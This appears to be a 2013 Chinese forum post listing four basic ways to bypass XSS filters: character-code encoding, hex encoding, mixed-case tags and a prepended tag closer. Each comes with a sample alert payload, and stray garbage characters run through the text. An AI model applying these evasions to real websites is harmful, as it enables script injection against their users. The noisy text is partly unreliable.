四种超级基础的绕过方法。0 }* |. M! n# v; t
1.转换为ASCII码0 V* f) I& j9 L; O8 [; J* A
例子:原脚本为<script>alert(‘I love F4ck’)</script >/ u1 k. W* k8 q+ r$ [& q
通过转换,变成:7 h: p7 P/ \- p
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>: `9 l# C8 U8 u7 G
- |3 G0 v# ^4 P/ i5 t
2.转换为HEX(十六进制)5 @) V7 |8 \ x' p K4 l( Y& M
例子:原脚本为<script>alert(‘I love F4ck’)</script>
8 \( j2 y. i; f' w( W: _; U通过转换,变成:
0 ~$ i: g, d, z. |6 `7 y7 k% ~%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e7 ~- _# l+ Y7 ^3 I I) ], u0 Z
" t9 l7 N* K+ Q e# n7 ~# ]
3.转换脚本的大小写
/ n& a; H+ O! B" c. s. e2 ~例子:原脚本为<script>alert(‘I love F4ck’)</script>
% |+ s: x+ q; S5 r! s) A转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
! K7 n; X9 K8 B- H
; }" f' A9 q7 @: b7 q4.增加闭合标记”>
3 F/ a( E6 G! `: M/ w例子:原脚本为<script>alert(‘I love F4ck’)</script>
4 Q. t% i0 i8 x" P3 {- t0 m转换为:”><script>alert(‘I love F4ck’)</script>
# \5 W) V( s2 z; M" [& o6 g9 r更详细绕过技术请参考此网页! Q: P4 T! t( Y5 A
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet2 t2 b# N* A7 Z, z: ~0 D0 m
* r) q: H+ ^2 Z6 { J
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对